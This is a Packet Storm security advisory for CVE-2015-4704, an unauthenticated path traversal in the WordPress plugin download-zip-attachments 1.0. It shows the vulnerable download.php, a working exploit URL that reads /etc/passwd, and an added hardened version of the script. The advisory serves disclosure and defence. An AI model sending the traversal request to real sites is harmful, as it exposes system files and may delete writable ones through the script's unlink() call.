Download Zip Attachments 1.0 File Download

2015-06-26T00:00:00
ID PACKETSTORM:132459
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-06-26T00:00:00

Description

Title: Remote file download vulnerability in download-zip-attachments v1.0  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-10  
Download Site: https://wordpress.org/plugins/download-zip-attachments/  
Vendor: rivenvirus  
Vendor Notified: 2015-06-15  
Vendor Contact: https://profiles.wordpress.org/rivenvirus/  
Advisory: http://www.vapid.dhs.org/advisory.php?v=129  
Description:   
Download all attachments from the post into a zip file.  
  
Vulnerability:  
download-zip-attachments/download.php appends the user-supplied File request parameter to the WordPress upload directory path and never checks that the resulting path stays within that directory. The script loads wp-load.php but performs no authentication or capability check, so any unauthenticated visitor can use ../ sequences to read arbitrary files the web server user can access. Because the script then calls unlink() on the same path, a file it can write to is also deleted after being served.  
  
<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
    define('WP_USE_THEMES', false);
    require('../../../wp-load.php');
    require "create_zip_file.php";
    $uploads = wp_upload_dir();
    // Attacker-controlled: $_REQUEST['File'] is concatenated with no sanitisation
    // and no containment check, so "../" climbs out of the upload directory.
    $tmp_location = $uploads['path']."/".$_REQUEST['File'];
    //echo $tmp_location;
    $zip = new CreateZipFile;
    $zip->forceDownload($tmp_location,false);   // serves whatever path was built
    unlink($tmp_location);                      // then deletes that same file
    exit;
}
  
CVEID: CVE-2015-4704  
OSVDB:  
Exploit Code:  
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd  
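For comparison, a hardened variant of download.php, added here as an illustration and not the plugin author's fix: it requires a logged-in user with the upload_files capability (an assumed policy, not something the plugin documents), accepts only a bare .zip file name, and verifies with realpath() that the canonical path lies inside the upload directory before serving or unlinking it. The CreateZipFile class, create_zip_file.php and wp_upload_dir() are the same ones the original script uses; everything else is assumed.

```php
<?php
// Added example, not the plugin's own code: a hardened form of download.php.
if (isset($_REQUEST['File']) && !empty($_REQUEST['File'])) {
    define('WP_USE_THEMES', false);
    require '../../../wp-load.php';
    require 'create_zip_file.php';

    // Assumed policy: only logged-in users who may upload files can fetch
    // generated archives. The original script has no check at all here.
    if (!is_user_logged_in() || !current_user_can('upload_files')) {
        status_header(403);
        exit('Forbidden');
    }

    $uploads = wp_upload_dir();
    $base = realpath($uploads['path']);

    // Accept only a plain archive name: no directory separators, no "..",
    // nothing but [A-Za-z0-9_-] followed by ".zip".
    $requested = $_REQUEST['File'];
    $name = is_string($requested) ? basename($requested) : '';
    if ($name === '' || $name !== $requested
        || !preg_match('/^[A-Za-z0-9_-]+\.zip$/', $name)) {
        status_header(400);
        exit('Bad file name');
    }

    // realpath() resolves symlinks and returns false for a missing file, so
    // the canonical target is compared against the canonical upload directory
    // plus a trailing separator (prevents /uploads-evil matching /uploads).
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($target)) {
        status_header(404);
        exit('Not found');
    }

    $zip = new CreateZipFile;
    $zip->forceDownload($target, false);
    unlink($target);   // now only ever a vetted .zip inside the upload directory
    exit;
}
```

The two checks are deliberately redundant: the file-name allow-list stops traversal before a path is built, and the realpath() prefix comparison catches anything the allow-list might miss (a symlink planted in the upload directory, for example), so the unlink() call can no longer reach a file outside that directory.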